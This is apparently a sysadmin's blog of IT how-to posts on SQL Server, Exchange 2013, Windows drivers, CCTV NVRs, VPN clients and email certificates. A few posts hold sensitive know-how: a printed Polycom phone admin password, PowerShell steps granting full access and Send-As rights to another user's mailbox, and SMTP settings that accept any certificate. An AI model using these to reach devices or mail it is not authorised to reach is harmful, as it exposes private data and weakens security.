To get around this, I add a specific DATABASE-USER account in ACTIVE-DIRECTORY. Then I change all the APP SERVICE on the clients machines to run as the DATABASE-USER (rather than the current-logged-in-user). This is done in SERVICES.MSC. Then I add that DATABASE-USER to the permissions on the SQL MANAGEMENT STUDIO.

  • select the DATABASE-USER.
  • leave the rest as the defaults.

Now you have to add this user to the DATABASE.

  • select USER MAPPING (on the left-hand side).
  • select the DATABASE you are controlling.
  • click OK (at the bottom).

After this is done (and only after), you now have to add permissions to the DATABASE for this user.

  • expand the DATABASES folder.
  • right-click the DATABASE name.
  • select PROPERTIES (at the bottom).
  • click PERMISSIONS (on the left).
  • select the USER (in the list).
  • place a CHECKMARK in the GRANT column for the following

8 -for the client machine to see and connect to the SQL DATABASE, you have to allow the port through the firewall.

9 -the port for each instance is randomly assigned.

10 - to find the port number, you have to use the SQL SERVER CONFIGURATION MANAGER.

  • click SQL SERVER NETWORK CONFIGURATION (on the left-hand side).
  • click on the DATABASE you are working on.
  • double-click TCP/IP (on the right-hand side).
  • click IP ADDRESSES (at the top)
  • scroll to the bottom.
  • mine says 51772

11 -you have to allow 2 PORTS through the WINDOWS FIREWALL.

  • random assigned TCP port.
  • UDP PORT 1434 (notice that this is a UDP PORT, not a TCP port).

I will post more as I come across.



Windows Update Location

Here is the location for Windows update:


Looking to see if a package is installed?

  • -start > run
  • -type: cmd
  • -click OK
  • -type: dism /online /get-packages | findstr 3035583
Last Updated on Saturday, 23 January 2016 17:14

ATA, AHCI, RAID Selection

You have the following options in the DELL BIOS:


What do you choose?

Choose AHCI.

Afterwards, make sure you have the following installed in the correct order:


While many sites claim that you must make your selection in the BIOS before WINDOWS-OS install, we don't accpet that around here. Of course it can be changed. But you'll need to make sure that the WINDOWS has the correct drivers enabled to start up.

    For ACHI:


    For RAID:


As a last resort, if that doesn't work, the incorrect drivers might be installed. Here's how to install the correct drivers.

This also applies when the motherboard is changed by DELL PRO SUPPORT and new drivers might need to be installed.

  • -find your motherboard model number.
  • -download the CHIPSET DRIVERS.
  • -extract them to the C drive (for example: c:\drivers\chipset)
  • -boot into REPAIR MODE or start with WINDOWS OS INSTALL media (usb, CD, PXE, etc).
  • -click REPAIR YOUR COMPUTER (bottom-left).
  • -click COMMAND PROMPT.
  • -find what letter your WINDOWS-DIRECTORY is.
  • -type: dism /image:e:\ /add-driver /Driver:e:\install\chipset\ /recurse
  • -hit ENTER
  • -type EXIT
  • -reboot

It may take awhile to reboot but it will install the correct drivers and start up fine.

Last Updated on Tuesday, 15 March 2016 11:15

Inspecting Hardware Info

Don't know why I've never had to do this before but in the past working with SolidWorks and Dell Precision Machines, I've found the need to inspect hardware detail information. This can be done in the following ways:

Last Updated on Friday, 22 January 2016 12:43

Exchange 2013 Get-Mailbox Only Returns Myself

Exchange 2013 Get-Mailbox Only Returns Myself. Get-Mailbox only shows your own record. You expect to see all the accounts because you are an Administrator. But you only see one mailbox when I type in: Get-Mailbox. It looks like this:

My Name     my.account     server-name     Unlimited

That's it. No other users.

Type in the following to see the ROLEGROUPS:


You will see all the ROLE GROUPS in EXCHANGE 2013. There's only one important group here. ORGANIZATION MANAGEMENT. Even though you might be an ADMINISTRATOR group in ACTIVE-DIRECTORY, that does not automatically make you an ADMINISTRATOR in EXCHANGE. To be an ADMINISTRATOR in EXCHANGE, you must be in the ORGANIZATIONAL MANAGEMENT group.

Let's look to see who is in the ORGANIZATION MANAGEMENT group.

-Get-RoleGroupMember "organization management"

You will see all the MEMBERS in the ORGANIZATION MANAGEMENT group. Most likely, there is only one and that is the Administrator account. Now let's add an account other than "Administrator" account.

-Add-RoleGroupMember "Organization Management" -Member my.account

Now when you type Get-Mailbox, you will get all the accounts in the domain.

GUI-wise you do this through the EAC:

-click PERMISSIONS (on the left)
-click ADMIN-ROLES (at the top)
-find MEMBERS section (at the bottom)
-click the PLUS SYMBOL +
-type in the account
-click OK > SAVE

ACTIVE-DIRECTORY-wise you do this through the AD USERS & GROUPS:

-click MEMBERS tab (at the top)
-add you users here

Install .NET Framework 3.5 on Windows Server 2012

Install .NET Framework 3.5 on Windows Server 2012:

-run POWERSHELL (as admin)
-type: Install-WindowsFeature Net-Framework-Core
-wait 10 minutes.

That should do it! Congrats!

You can check to see if it installed by:

-type: Get-WindowsFeature

And if you install the GnuWin32, you can grep to your heart's content:

-type: Get-WindowsFeature | grep -i framework

Last Updated on Monday, 11 January 2016 14:43

Renaming computers in a domain

To rename computers in a domain:

netdom renamecomputer currentcompname /newname:newcompname /usero:domain\adminname /passwordo:* /userd:domain\adminname /passwordd:* /force /reboot:10

Drop off the /reboot if you want the change to happen the next time the computer is rebooted (and not immediately). So it would be:

netdom renamecomputer currentcompname /newname:newcompname /usero:domain\adminname /passwordo:* /userd:domain\adminname /passwordd:* /force

PowerShell v5 has a new way of renaming computers found here: https://technet.microsoft.com/en-us/library/hh849792.aspx

Here is the command for the local computer:

Rename-Computer -ComputerName . -NewName <New name>

But if I wanted to rename a local computer, I would just do it graphically. The point is to rename a remote computer.

Rename-Computer -NewName Server044 -DomainCredential Domain01\Admin01 -Restart

Last Updated on Wednesday, 06 January 2016 17:45

Toshiba Scan to Email Settings

SMTP Client
Enable SMTP Client: Enable
Enable SSL: Accept all certificates without CA
SMTP Server Address: smtp.gmail.com
POP Before SMTP: Disable
Authentication: Plain
Login Name:  This e-mail address is being protected from spambots. You need JavaScript enabled to view it
Login Password: setthistosomething
Maximum Email / Internet Fax Size: 20 MB
Port Number: 587
SMTP Client Connection Timeout: 30 Seconds

NVR Part 2 - Digital Watchdog Blade (DW-BJBLADE)

The Digital Watchdog Blade (DW-BJBLADE) is a much better NVR than that last NVR product I reviewed (see NVR Part 1 - HIKVISION). It is more robust in it's ability and power. As always, with more more power comes more cost and potential complexity.

The Digital Watchdog (DWD) NVR is a Linux Ubuntu system running on an Atom x64 processor. They don't even try to hide or limit the Ubuntu system. The system boots directly to the Ubuntu desktop.

Since it is a full GUI desktop, they even include TEAMVIEWER for each system to allow for remote access.

What was surprising for me was how well UBUNTU performed on such a low-powered ATOM x64 processor.

The issue I had was that the incorrect QUICK-START-GUIDE was included. I found the correct version (listed below) with a simple google search.

Requirement Packages

The DWD NVR solution is comprised of 3 software packages:
1. Enterprise Controller (managing database)
2. Media Sever (recording video)
3. Client (viewing recorded video)

The software packages have to be installed that way as well due to dependencies.

For me, the CLIENT was not installed on the system. (This is what lead to the hours I devoted in breaking/researching/fixing/RMA'ing the system).


Most likely, you will need the x64 packages.

All the packages should be here:

AFAICT, there is not seperate packages for different NVR's. The same SPECTRUM software is used across all products. The only difference is the version number (v1, v2, v3, etc) and the install base (Windows, Linux, Mac, etc) as well as the architecture (x86 or x64).

(click DOWNLOAD [at the bottom])

They list the incorrect versions. They listed the Beta versions of 2.3. The CONTROLLER was mis-matched at verion 2.1 (a downgrade in version from what was installed). The last thing I want is to install Beta versions at a client install or have an untested version mis-match. And repairing a v2.2 with a v2.1 is impossible.

Install Packages

On an Ubuntu system:

-the package manager is: dpkg
(this is like rpm in redhat/rhel/centos. Stands for Debian Package)

-the gui package manager is Ubuntu Software Manager.

-the update manager is apt-get (manages dependencies.)
(this is like yum in redhat/rhel/centos)

DWD recommends to:

-download the packages.
-right-click and open-with UBUNTU-SOFTWARE-CENTER
-click INSTALL/UPGRADE/RE-INSTALL (at the top right).

Forgot Password

If for some reason, you forgot the password, you can re-install the CONTROLLER software by using the steps above. Reinstalling the CONTROLLER package will go through a setup and allow you to reset the password. If you have an existing system and need to keep the database, please choose to KEEP THE DATABASE. Obviously, if you choose to delete the existing database, you will not be able to get it back without a backup.

That's it!!! Happy NVR'ing!!!


QUICK-START-GUIDE: http://publiclibrary.dwcc.tv/Sales%20Tool/DW%20Spectrum%20Documents%20&%20Videos/Documents/Blackjack_Spectrum_QSG.pdf

MANUAL: http://publiclibrary.dwcc.tv/Sales%20Tool/DW%20Spectrum%20Documents%20&%20Videos/Documents/DWSpectrum_User_Manual.pdf

REPO: http://publiclibrary.dwcc.tv/

Last Updated on Friday, 16 October 2015 11:24

Streaming Video

Streaming video is usually done through RTSP or real-time streaming protocol. IP-Cameras typically have RTSP.

However, it's possible (not probable) that NVR/DVR have RTSP as well.



<ID> is YXX where Y = channel number and XX is main (01) or sub stream (02)

ID 501 = Channel 5 main stream
ID 402 = Channel 4 sub stream


rtsp://admin: This e-mail address is being protected from spambots. You need JavaScript enabled to view it /Streaming/Channels/201
rtsp://user: This e-mail address is being protected from spambots. You need JavaScript enabled to view it :10554/Streaming/channels/101
rtsp://admin: This e-mail address is being protected from spambots. You need JavaScript enabled to view it :10554/Streaming/channels/102

How I Do It

What I do is get the ONVIF DEVICE MANAGER. It is a free Windows-based dedicated program (download ONVIF DEVICE MANAGER here) that lists out all the devices on the location and shows all the settings in the camera or NVR. This happens even if the options don't show in the devices natural web portal.

What's better is that ONVIF DEVICE MANAGER will show the correct RTSP URL for both the cameras and the NVR's. The reason for this is because OEM's are changing their RTSP port from the default of 554 for security reasons.

You can type this into VSPLAYER or VLC MEDIA PLAYER.


Hikvision/Swann/Lorex are sometimes all the same. Hikvision is the OEM. Swann/Lorex rebrand the equipment. Apparently, they have other OEM's as well.



Last Updated on Tuesday, 13 October 2015 08:18

Sonos Surround Speakers

What's great about Sonos is that the speakers can be paired and grouped in different ways all through the Sonos app either on the ipad/iphone/droid or through the app on the Win/Mac platform.

Playbar, Sub and Surround. Oh my!

The Sonos Playbar/Soundbar is rather straightforward. Adding the Sonos Sub is straightforward as well.

Adding the surround can be not-so-straightforward:

  • -setup Playbar/Soundbar via Sonos app.
  • -setup the Surround Amp via Sonos app.
  • -afterwards, click help > about-my-sonos-system
  • -find the IP of the Playbar/Soundbar (not Amp).
  • -open a browser (Internet-Explorer, Firefox, Chrome)
  • -type: http://the-ip-of-the-soundbar:1400/wiredsat.htm
    (for example:

It is straightforward from this point.

Last Updated on Tuesday, 13 October 2015 08:16

Taskbar Location

TASKBAR Location:
%appdata%\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar


Last Updated on Tuesday, 13 October 2015 08:16

NVR Part 1 - Hikvision DS-7608NI-SE/8P

PTZ = pan, tilt zoom

NVR = network video recorder.

LPR = license plate recognition.


Cameras are just dumb devices. They simply display the video. You can connect directly to the camera by typing in the IP address of the camera. The cameras have different settings & functions depending on the carmera manufacturer. Most of the time though, you can at least view what's on the camera. What's interesting is that all the capabilities of the camera are not always available via the web interface. More on that later.

Take note however, that what's being displayed on the camera is in no way related to what's being recorded. These are actually two different resolutions depending on settings.

For a HIKVISION NVR () to record what's on the camera, it must connect to the camera. To be able to connect to the camera, it needs:

  • -the camera IP address.
  • -a protocol.
  • -a port number.
  • -a channel number.
  • -a username.
  • -a password.

The important part here is that as long as the NVR can communicate with the camera, it should be able to record the video.

This leads to two scenarios.

1- in the first scenario, if the NVR can communicate to the camera, everything is good as long as it has the settings above.

2- in the second scenario, some NVR's have their own IP address range and use this range on the switch built into the device. This IP range is 192.168.xxx.(1-254). So if you look at the back of the device, you will see 4 ports or 8 ports or possibly more. When a camera with DHCP is plugged into one of these ports the NVR will assign it's own IP address to the camera. For example,

If a camera has a static IP set, the NVR will NOT assign an IP address. Consequently, you must:

  • -connect the camera to the local network (not the back of the NVR).
  • -change the IP address to that of the internal NVR network (for example
  • -this will cause the camera to no longer be accessible.
  • -manually plug the camera into the back of the NVR.


Regardless of how you connect, the protocol must match. There are different protocols for each manutfacturer (Axis, etc) and an ONVIF protocol as a generic protocol using port 80.

Stream Types

The cameras have multiple streams and in different formats.

The record is on the MAINSTREAM (stream-1 or channel-1). Typically this stream is of higher quality and bit rate compared to a sub-stream..

The view is on the SUBSTREAM or SECONDARY STREAM (stream-2 or channel 2). This happens because stream-1 but might not be good for viewing over the wan internet. Typically the sub-stream is a lower-resolution.

MJPEG: This format uses standard JPEG still images in the video stream. These images are then displayed and updated at a rate sufficient to cr eate a stream that shows constantly updated motion.

MPEG-4: This is a video compression standard that makes good use of bandwidth, and which can provide high-quality video stre ams at less than 1 Mbit/s. MPEG-4 can be encoded in 2 ways either SIMPLE (sets the coding type to H.263 ) or ADVANCED. Usually SIMPLE is fine.

Communication Methods

To deliver live streaming video over IP networks, various combinations of transport protocols and broadcast methods are employed.

• RTP (Real-Time Transport Protocol) is a protocol that allows programs to manage the real-time transmission of video data. It uses UDP.

• RTSP (Real-Time Streaming Protocol) allows a connecting client to start an MPEG-4 stream. It serves as a control protocol, to negotiate which transport protocol to use for the stream. RTSP is thus used by a viewing client to start a unicast session, see below. It uses TCP. The default setting is port 554. If it is not enabled, MPEG-4 streams will not be available.

• UDP (User Datagram Protocol) is a communications protocol that offers limited service for exchanging data in a network that uses the Internet Protocol (IP). UDP is an alternative to the Transmission Control Protocol (TCP). The advantage of UDP is that it is not required to deliver all data and may drop network packets when there is network congestion, for example. This is suitable for live video, as there is no point in re-transmitting old information that will not be displayed anyway.

• Unicasting is communication between a single sender and a single receiver over a network. This means that the video stream goes independently to each user, and each user gets their own stream. A benefit of unicasting is that if one stream fails, it only affects one user.

Unicasting should be used for video-on-demand broadcasting, so that there is no video traffic on the network until a client connects and requests the stream. However, if more and more unicast clients connect, the server will at some point become overloaded. There is also the maximum of 20 simultaneous viewers to be considered.

• Multicast is bandwidth-conserving technology that reduces bandwidth usage by simultaneously delivering a single stream of information to multiple network recipients. This technology is used primarily on delimited networks (intranets), as each user needs an uninterrupted data flow and should not rely on network routers.

It is not possible to multicast through a router. Consequently, it is not possible to multicast over the Internet. It is possible to get around that by using RTP tunneled over RTSP. Crazy isn't it.

Accessing Video Real-Time

As single JPEG images in a browser. Enter the path, for example: http:///axis-cgi/jpg/ image.cgi?resolution=CIF

  • • Windows Media Player. This requires codecs to be installed. The paths that can be used are listed below, in the order of preference.
  • • Unicast via RTP: axrtpu :///mpeg4/media.amp
  • • Unicast via RTSP: axrtsp:///mpeg4/media.amp
  • • Unicast via RTSP, tunneled via HTTP : axrtsphttp:///mpeg4/media.amp
  • • Unicast via RTSP, tunneled via HTTP S: axrtsphttps:///mpeg4/media.amp
  • • Multicast: axrtpm:///mpeg4/media.amp


  • D1 = 704x480
  • HD = 1920x1080p
Last Updated on Tuesday, 13 October 2015 08:19

CCTV Camera Systems & NVR's

So far, I have dealt with some of the following for Camera solutions:

  • -Hikvision
  • -Geovision
  • -Digital Watchdog

So far, I have dealt with some of the following NVR/VR solutions:

  • -Hikvision
  • -Digital Watchdog
Last Updated on Tuesday, 13 October 2015 11:43

VOIP Solutions

So far, I have dealt with some of the following for VOIP solutions:

  • -Fonality
  • -IPitomy
  • -Zultys
  • -Sark
  • -Mitel

The only SIP service I've dealt with is:

  • -Level3 Sip Trunk

Windows 10 Upgrade on Domain

NOTE: This article post is out of date. Microsoft starting pushing WINDOWS 10 to computers on domains in Q2 2016.

By default, computers on a domain will not receive the upgrade-notification to Windows 10.

You have two options:

1-If you are going to do this a bunch of times, download the WINDOWS 10 DOWNLOAD TOOL here:

It will save a bunch of bandwidth in a corporate environment since each computer will download a few GB of data.

2-add a regedit here:

  • -click here for the regedit: windows10.reg
  • -click on the regedit.
  • -click YES (when it asks if you want to merge).
  • -restart computer.
  • -click UPDATE TO WINDOWS 10

I prefer the second method since bandwidth is "free" and only costs time. On the good side, it happens automatically ;-)

Last Updated on Sunday, 17 July 2016 21:58

Wifi Access Points

So far, I have dealt with most typical wireless solutions for smaller projects:

  • -Linksys
  • -Netgear
  • -Dlink
  • -Asus
  • -DDWRT

I have also dealt with some enterprise solutions:

  • -Cisco
  • -Meru
  • -Watchguard

Now I'm getting into middle-ground projects:

  • -Luxul
  • -Ruckus
  • -Engenuis
  • -Ubiquity

These solutions focus in on the look of the WAP as well as the function of the WAP.

Last Updated on Tuesday, 13 October 2015 08:20

Google Sheet Import Another Google Sheet

Google Sheet Import Another Google Sheet. Or move Google Sheet to another Google Sheet.

You'd think this would be simple to find but it isn't. Unfortunately, it's probably the semantics.

  • -open the GOOGLE SHEET you want to move.
  • -you will see the tabs below.
  • -click the down-arrow in the tab you want to move.
  • -click COPY TO.
  • -select the GOOGLE SHEET you want to move to.
  • -voila!

The sheet will take a new name called. "copy of sheet-name-you-just-moved."

remote desktop connection cannot verify the identity of the computer that you want to connect to

You are on a Mac. You want to use REMOTE DESKTOP CONNECTION (rdp). When you try and use it to connect to a WINDOWS SERVER, you get,"remote desktop connection cannot verify the identity of the computer that you want to connect to."


-upgrade the a newer version of REMOTE DESKTOP CONNECTION via APP STORE on the MAC.

This will work if you are on v10.7 and higher. This will not work on 10.6.8 and lower. I suppose in 08/2015 that a more up-to-date OSX version is mostly everywhere but I still prefer stability. And that means 10.6.8. Looks like it's time to upgrade the OSX.

-get CORD.

Download. Install. Voila!

Windows 7 ISO to Bootable USB on Mac

The downloadable Windows 7 ISO's from Microsoft are no longer available unless you have a retail INSTALL-KEY. Probably due to the push to Windows 10.

I found myself in a position with a Windows 7 ISO OEM and no Windows 7 DVD.

How do you burn a Windows 7 ISO to a Bootable USB on Mac?

Despite various other attempts, this is the only instruction set that worked.


  • -insert usb-stick.
  • -open DISK-UTILITY.
  • -partition with 1 partition.
  • -format at it as raw disk.
  • -select the option to have a GPT BOOT.
  • -apply changes.


  • -open terminal.
  • -type: diskutil list
  • -it should output the disks, their device-names and the partitions.
  • -type: diskutil unmountDisk /dev/disk1 (substitute for your disk number here)
  • -type: sudo dd if=/path/to/downloaded.img of=/dev/rdisk1 bs=1m
  • -wait about 20~30 minutes.
  • -diskutil eject /dev/disk1 (substitute for your disk number here)


  • -you do not have to format the usb stick with a filesystem (ntfs, fat, hfs+, etc). The ISO already has the filesystem in it.
  • -if terminal is open, you can check the progress by hitting CTRL+t.

Office365 Password is Incorrect

Office 2011 is installed on your Mac. You click on WORD, EXCEL or other Microsoft Mac Product. It asks you to login. You type in your email address and password to your Microsoft account. It returns, "Sign in failed because the password is incorrect or the sign-in name does not exist."

Here's how to fix:

  1. -sign in to your Microsoft account @ https://account.live.com/ (This is different than https://office.microsoft.com)
  2. -click SECURITY & PRIVACY (top right).
  3. -find ACCOUNT SECURITY section (top left-most section).
  5. -scroll down to find APP PASSWORDS section.
  7. -at this point it will either show you an APP PASSWORD or you will have to create a new APP PASSWORD.
  8. -use that APP PASSWORD to login on WORD, EXCEL or other Microsoft Mac Product


Here's a nice one that's been hitting some of my web sites:

Apparently, it's an tool to scrape the content off of someone's web site. In this case, mine.

The web and technology can be an awesome and exciting place. It can also be a place for theives and low lifes. I still don't understand why people wouldn't want to spend their time in creation rather than theivery.

You might be able to steal my content but you can't steal my ability to think rationally and solve problems. And that, ultimately, is the only real item of value.

Exchange 2013 Get Parameters of Cmdlets (Get Command Variables)

So you know a CMDLET-KEYS like NEW-TRANSPORT or GET-TRANSPORT but how do you find out the VARIABLES? What is possible to type in after the KEY?


Even though I refer to these as KEYS/VARIABLES/VALUES, in the MS-POWERSHELL world (or MS-POWERSHELL-ISA world), these are referred to as the CMDLET/ParameterName/ParameterValue.


Use the following as a guide:

TYPE: (Get-Command New-TransportRule).Parameters

TYPE: (Get-Command Get-TransportRule).Parameters

(What's interesting here is that they refer to the list as the KEY => VALUE .)

Exchange 2013 Block Sender (Block From)

Here's one for you. How do you block a sender that keeps changing the email address they use? For example, I want to block "Tom Night". I don't care what email address "Tom Night" uses, I want his emails gone. Poof.

  • -open ecp
  • -mail-flow > rules
  • -click CREATE NEW RULE
  • -click MORE OPTIONS (at the bottom)
  • -click ENTER TEXT (for header)
  • -type FROM
  • -click OK
  • -click ENTER WORDS
  • -type "Tom Night"
  • -click the + (plus symbol)
  • -click OK
  • -click SAVE

That should do it. What's happening here is that we are blocking the NAME in the HEADER rather than using the FROM-parameter as the FROM-parameter uses email-addresses (externally) and mailboxes (internally).

Something like:

Set-TransportRule "Block Tom Night" -HeaderContainsMessageHeader "From" -HeaderContainsWords "FirstName LastName" -Actions {DeleteMessage} -DeleteMessage True

If you want to see all the TRANSPORTRULE options, type:


Last Updated on Wednesday, 19 July 2017 12:55

Remote Support

My take on remote support software.

TeamViewer Host

$750 1-time fee. But it only is good for that version. And versions don't intermingle. If you upgrade your server, you must upgrade all your clients. :-(

Remote Utilities

$500 1-time fee. Windows only. No mac support. :-(

LogMeIn Rescue

$1299 per year :-( But it's a final solution with reboot into safe mode plus other goodies. ;-) Many large support companies use.


I can't figure out the pricing. I think it's around $30 per remote pc. It only works on windows. No Mac support. :-(


No longer available.

Aero Admin

$280 1-time fee. Not seemless. No service. Must config via Windows task scheduler. Yuck. :-(


$240 per year. I've had trouble with UAC, no mouse moving, etc. :-(


$50 per client :-(


$850 per year. But it's enterprise ready.


$7000 1-time fee. Enterprise ready.


$350 1-time fee. :-) Many features.


$950 1-time fee. :-) Seems to be just for LAN/AD/MPLS/VPN. WAN capabilities limited.


$350 1-time fee. :-) SolarWinds portfolio. :-) WAN capabilities limited.

CentraStage / Autotask

$24 per node annually. I'm not sure but many are upset at Autotask. I'll choose to stay away.


$12 per computer annually & $150 per server annually.


$15 per computer annually & $175 per server annually or little higher than GFI Max is all I found. But they have an interesting white label tech support with 24 hour availability.


Can't find much but I know it's similar to those above. Price per node per month.

Last Updated on Tuesday, 13 October 2015 08:21

Windows Profile Always Loads Default Profile (Or Temporary Profile)

Windows Profile Always Loads Default Profile (Or Temporary Profile).

How to fix:

  • -login to another account with ADMINISTRATIVE PRIVILEDGES.
  • -click START > RUN > REGEDIT
  • -browse to: HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Profilelist/
  • -find profile that isn't working.
  • -you might find duplicate profile in this area. The new one is being loaded with nothing in it. The old one may have .bak at the end.
  • -add .old to end of incorrect profile.
  • -removed .bak from end of correct profile.
  • -go to the profile not working (only if needed).
  • -changed refcount from 1 to 0 (only if needed).
  • -changed state value from 33024 to 0 (only if needed).
  • -restart and login to the user account.

That's it!!! You're hired!

NiNite et al

A list of tools that I want to use and some I've never knew of:

  • -vi
  • -putty
  • -solarwinds stuff
  • -ninite
  • -powershell/cmd
  • -hirens
  • -ubcd
  • -knoppix
  • -MRAT
  • -mremoteng
  • -nagios/prtg/zabbix
  • -devolutions-remotedesktopmanager
  • -leatherman
  • -wire-tester/toner-probe
  • -lansweeper


  • veeam
  • sonicwall/watchguard
  • virus/spyware/malware
  • printer setup/service
  • server management
  • desktop management
  • shadowprotect
  • esxi free, hyperv, xenserver
  • wireless setup
  • lan/wan design & implementation
  • remote support
  • break/fix
  • contract support/managed-service-provider
Last Updated on Thursday, 25 June 2015 16:04

727-777-5827 is a Scam

If 727-777-5827 is a scam. Here's the short version:

  • -got a phone call from 727-777-5827.
  • -automatic message.
  • -press 1 to speak to local representative.
  • -"Hi, who is this?" I asked.
  • -"Gene."
  • -"Who are you with?"
  • -"SEO INC."
  • -"Where are you located?" I asked.
  • -"Southern California."
  • -"That's not very local." I stated.
  • -They hung up.
Last Updated on Thursday, 25 June 2015 12:32


I have experience with many firewalls.

  • -SonicWall
  • -WatchGuard (FireBox).
  • -DDWRT/BusyBox.
  • -Untangle.
  • -anything Linux/Unix with IPTABLES.

What's funny is that one time a CFO starting asking me questions about the firewall because they allowed a KEY-LOGGER onto one of their accounting systems and because of their poor choice in banks it logged the USERNAME and PASSWORD to the web site that allows them to do WIRE TRANSFERS.

During the course of asking questions, she said, "You don't seem to know a lot about this?"


Still at some level, a point can be derived that not all firewalls are the same. The general idea is that you want to block/allow access to certain items at a network level rather than at a desktop level. You are trying to block incoming items at that network level.

To the network administrator, this can be seen as blocking/allowing the ports needed and directing them where they need to go.

To a client, this is blocking everything bad in the universe from getting on the local machine. So if the person in accounting is playing games, clicks on a link in a spam email and downloads something harmful, this is a result of the firewall not being strong enough and not a result of the person in accounting.

Nor is it the fact that they were trying to save money by going with a less than average bank who ALLOWS WIRE TRANSFERS BY A SIMPLE USERNAME AND PASSWORD!!! ARE YOU OUT OF YOUR MIND!!!

Still firewalls can be used to keep people from harming themselves by blocking some types of files. From this point, you'll have to manage the fine balance of allowing items through to make work flow and block evil stuff all at the same time.

Last Updated on Monday, 22 June 2015 10:50

Polycom Phone Set Password

Here is the Polycom Phone Set Password:

USER: Polycom
PASS: 9418941962

You can apply this to the other Polycom articles in this blog.

Again, what's interesting is that some of the settings have to be set via the phone set itself and some of the settings have to be set via the server.

In this particular case, I wanted to display the EXTENSION instead of the NAME. This is set via the phone config rather than via the server config.

Last Updated on Monday, 22 June 2015 10:12

View User's MailBox in Exchange 2013

Let's say you want to view a user's mailbox in Exchange 2013. Here's the trick:

This will get you into their mailbox. If you don't have permission, it will say, "You don't have permission to open this mailbox."

To fix this, you'll have to go into the powershell and type:

  • Add-MailboxPermission foo.user -user foo.user2 -AccessRights FullAccess

You can view but you can't send mail as them. You have to go one step further:

  • Add-ADPermission foo.user -user foo.user2 -ExtendedRights Send-As
Last Updated on Thursday, 10 August 2017 10:31

DDPE Recovery

So let's say you have DDPE encrypting the full drive. The drive won't boot. Now you can access your computer and the files you can access are encrypted so you can't read them. What do you do?

Well if you have the encryption keys, you'll be able to retrieve the documents with a set of tools from Dell called the DDPE Administrative Utilities.

  • -build a WINDOWS PE disk from a working computer (how to do this is outside the scope of this document).
  • -copy over the DELL WINDOWS RECOVERY KIT (really what we need are the unzipped OFFLINE TOOLS, more specifically the cmgau.exe. See below.)
  • -copy over the encryption keys (It'll say something like LSARecovery_machine-name-here.exe).
  • -boot from the USB
  • -exit out of OPAL SED
  • -at the command prompt go to e:\dell-offline-admin-32bit-version-number-here\
  • -type: cmgau.exe -o
  • -type in the directories you want decrypted.
  • -point to the LSARecovery_machine-name-here.exe
  • -type in the PASSWORD for the LSARecovery_machine-name-here.exe

The process with decrypt the DDPE directories that you specified. You will have to wait for it to decrypt and then transfer those documents over to a working drive.

The following help:

Last Updated on Wednesday, 19 August 2015 06:30

OpenVPN and Mac Client

I'm in a situation where I need to use OPENVPN on a Mac. This requires an OPENVPN MAC CLIENT.

So my natural question progression is this...

Q: Can I use the built-in VPN client on the MAC?
A: Because OPENVPN uses a different mechanism than what's built into MAC OS X, a software package is required. This mechanism is called a kernel extension or kext. The kext that is needed is either TUN or TAP. Since you need a kext, you need to install a software package.

Q: What software package is needed then?
A: There are a few options:

  1. original OpenVPN Connect app.
  2. Tunnelblick.
  3. Viscosity.

Q: What is recommended?A: It seems everyone tends to use Tunnelblick.

Last Updated on Friday, 15 May 2015 10:09

Personal Email Certificates for Outlook - Digital Signature

A PERSONAL EMAIL CERTIFICATE is a certificate that verifies that the email is from the original author and that the email message isn't altered. This is like a seal on an real message. That seal might be a wax spot with a unique marking. The seal doesn't prevent someone from reading the message (this is the job of encryption). All someone has to do is open the message. What the seal does, it that it ensures that the message is verified from the author and that the message hasn't been altered.

There are several places to get PERSONAL EMAIL CERTIFICATES. MOZILLA helped in identifying some of those places here:

After about a minute of searching, I figured the best route to go was with COMODO as it's free. I can afford free.

Get a Personal Email Certificate

Export the Personal Email Certificate

The issue here is that we need it installed on the OS SYSTEM (not in the BROWSER).

  • -click FIREFOX > PREFERENCES > ADVANCED (on the left-hand side) > CERTIFICATES (at the top).
  • -click VIEW CERTIFICATES (at the bottom).
  • -click YOUR CERTIFICATES (at the top).
  • -click BACKUP (at the bottom).
  • -save the certificate to your DESKTOP.
  • -type in a password so it can't be used elsewhere.
  • -it should save it as something like "foo.p12"

Great! You have the certificate on your system. Now we have to install it.

Install the Personal Email Certificate on MAC OS X (not needed on Windows 10)

Let's install the Personal Email Certificate.
(FYI - this is for a MAC OS X system.)

  • -click FILE > IMPORT ITEMS (at the top menu).
  • -select the file "foo.p12"
  • -select LOGIN (next to "Destination Keychain").
  • -click OPEN.
  • -type in the password for the certificate.
  • -type in the password for the keychain (if required).

That's it! It should save the certificate in the correct spot.

Get OUTLOOK to Use the Personal Email Certificate

Now we have to get OUTLOOK to use the Personal Email Certificate.

This is for a MAC OS X system / OUTLOOK 2011:

  • -click TOOLS (at the top) > ACCOUNTS > ADVANCED (at the bottom).
  • -click SECURITY (at the top).
  • -find the top section called DIGITAL SIGNING.
  • -select your certificate.
  • -click OK (at the bottom).

This is for WINDOWS 10 / OUTLOOK 2016:

  •  -open OUTLOOK 2016
  • -click FILE > OPTIONS
  • -click TRUST-CENTER (on the left-hand side).
  • -click TRUST-CENTER-SETTINGS (bottom-right).
  • -click EMAIL-SECURITY (left-hand side).
  • -find DIGITAL-ID'S (CERTIFICATES) section
  • -click IMPORT/EXPORT
  • -find the .p12 file.
  • -type in the password that you created for the file.
  • -click OK.
  • -click OK > OK.

That should do it! Your certificate is installed and people will get a little cool lock that indicates that email messages from you are really yours. This gives confidence to your readers that you are who you say you are and that you really are smart and conscience about security! Good job!

Last Updated on Thursday, 20 April 2017 13:30

Exchange 2013: Blank Page After Login | An error occurred while using SSL configuration for endpoint

As title says, blank page after login to the EAC. Or the OUTLOOK clients can't connect. Or the IPHONE clients can't connect. Or the Exchange Management Shell Fails to connect.

Looking in the WINDOWS-LOGS > SYSTEM, I see, "An error occurred while using SSL configuration for endpoint"

This happens because EXCHANGE screwed up its binding to the SSL CERTIFICATE.

First, make sure you know what SSL CERTIFICATE the EXCHANGE should be using. You can see a list of SSL CERTIFICATES in IIS:

  • -open IIS MANAGER.

You want to make sure that it is issued by a TRUSTED SOURCE (like GoDaddy, GlobalSign, Comodo, Symantec). Also, make sure that all the appropriate alternative names are in the certificate (like autodiscover., computer-name., www., mail., webmail., null)

Once you know what certificate that you want to use.

  • -open IIS MANAGER.
  • -browse to the "Exchange Back End" website.
  • -click Bindings (on the right-hand side).
  • -mark the "https" binding (normally on port 444) and click Edit...
  • -change to the correct certificate.
  • -click OK > CLOSE.
  • -click server name (on the left-hand side).
  • -restart IIS.

